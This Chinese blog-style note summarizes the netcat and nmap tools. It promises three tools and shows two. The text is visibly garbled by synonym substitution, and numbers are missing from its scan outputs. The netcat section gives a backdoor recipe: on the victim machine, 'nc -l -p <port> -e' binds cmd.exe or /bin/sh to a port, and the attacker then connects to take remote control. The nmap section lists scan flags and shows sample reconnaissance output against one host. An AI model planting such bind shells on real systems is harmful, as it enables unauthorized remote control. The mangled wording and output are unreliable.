这三款东西是网络安详利器,做一个简朴摘要,以备参考。
netcat--网安瑞士军刀
netcat可以用于监控/扫描网络端口,它应用最多的环境是后门措施。
一般分两个步调:
步调一: 我们在被进攻的呆板上用下列呼吁:nc –v –l –p 端标语 –e shell //
个中端标语是我们欲将shell绑定到哪个端口,shell在差异的系统是差异,在Windows下是cmd.exe,在Linux下一般是/bin/sh。
步调二: 进攻者在本身的呆板上利用呼吁 :nc 被进攻者IP 端标语来到达长途节制受害者(被进攻者)的呆板。
下面的例子是将windows下的cmd.exe绑定在80端口,
然后在Linux呆板长举办节制
可以看到,我们在Linux下完全获得了Windows下一样的cmd.exe,并且我们可以完全像在当地节制一样长途完全节制Windows。
__________________________________________
nmap: 成果强大的端口扫描东西
简朴来讲,nmap有以下几种主要用法
全面扫描:nmap-T4 -A targetip
主机发明:nmap-T4 -sn targetip
端口扫描:nmap-T4 targetip
处事扫描:nmap-T4 -sV targetip
操纵系统扫描:nmap-T4 -O targetip
下面给出几个例子,如默认扫描一台主机的开放端口
C:Usersaa>nmap 101.41.11.45
Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-23 14:13 中国尺度时间
Nmap scan report for 101.41.11.45
Host is up (.00061s latency).
Not shown: closed ports
PORT STATE SERVICE
/tcp open netbios-ssn
/tcp open https
/tcp open apex-mesh
/tcp open mysql
/tcp open ms-term-serv
MAC Address: ::D1:8A:: (Micro-star International CO.)
Nmap done: IP address ( host up) scanned in 1.49 seconds
端口有如下四种状态:
Open port(防火墙答允少数端口打开)
Closed Port(由于防火墙的缘故,大部门的端口被封锁)
Filtered(Nmap不确定端口是否打开可能封锁)
Unfiltered(Nmap可以或许会见这个端口,可是不清楚这个端口打开的状态)
假如用-A选项,会有越发具体的信息,所有开放端口、对应的处事、操纵系统信息会尽收眼底。。。
C:Usersaa>nmap -A 101.41.11.45
Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-23 14:16 中国尺度时间
Nmap scan report for 101.41.11.45
Host is up (.00011s latency).
Not shown: closed ports
PORT STATE SERVICE VERSION
/tcp open netbios-ssn
/tcp open ssl/http Apache httpd
|_http-title: VisualSVN Server
|_http-favicon:
/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
/tcp open mysql MySQL 5.5.
| mysql-info: Protocol:
| Version: 5.5.
| Thread ID:
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactio
ns, Secure Connection
| Status: Autocommit
|_Salt: w{'M-:xq
/tcp open ms-term-serv?
MAC Address: ::D1:8A:: (Micro-star International CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP
Network Distance: hop
Host script results:
|_nbstat: NetBIOS name: XXXXXXX, NetBIOS user: <unknown>, NetBIOS MAC:
::d3:8a:: (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows LAN Manager)
| Name: WORKGROUPXXXXXXX
|_ System time: -- :: UTC+
TRACEROUTE
HOP RTT ADDRESS
0.10 ms 101.41.11.45
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: IP address ( host up) scanned in 111.66 seconds